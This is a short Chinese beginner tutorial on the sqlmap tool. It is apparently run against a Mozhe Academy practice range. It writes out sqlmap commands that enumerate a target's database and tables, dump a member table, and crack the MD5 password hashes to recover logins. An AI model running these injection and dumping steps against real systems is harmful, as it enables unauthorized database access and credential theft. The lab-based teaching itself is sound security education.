SQL map的基本用法

SQL map的基本用法（初步入门）

sqlmap是一款非常强大的开源sql自动化注入工具，可以用来检测和利用sql注入漏洞。它由python语言开发而成，因此运行需要安装python环境。

首先，我们需要检测注入点是否可用
我以墨者学院的靶场为例：

这里的公告就是一个合适的注入点
（检测注入点需要利用其他工具）


我们可以利用手工注入的方式，但有些费时，因此我们可以使用SQL map等工具来辅助操作。
打开SQL map

输入python sqlmap.py -u “http://219.153.49.228:46548/new_list.php?id=1” --current-db
这里引号内是需要注入的网址，“–current-db”则是获取数据库名

然后再列出数据库的表
输入：python sqlmap.py -u “http://219.153.49.228:46548/new_list.php?id=1” -D mozhe_discuz_stormgroup --tables
D是表示数据库，tables是求表名

我们可以看到这里仅有两个表，因此我们无需再细化，可以直接将表中数据输出：
输入：python SQLMAP.py -u “http://219.153.49.228:46548/new_list.php?id=1” -D mozhe_discuz_stormgroup -T stormgroup_member --dump

表中的“name”下的是用户名，“password”下是密码，但是这个密码是通过md5加密的，我们需要使用md5解密工具进行解密。

这样，我们就很轻松的获取了用户名和密码。尽管工具确实很好用，但也不能完全依赖工具，手动注入的方法也应熟练掌握！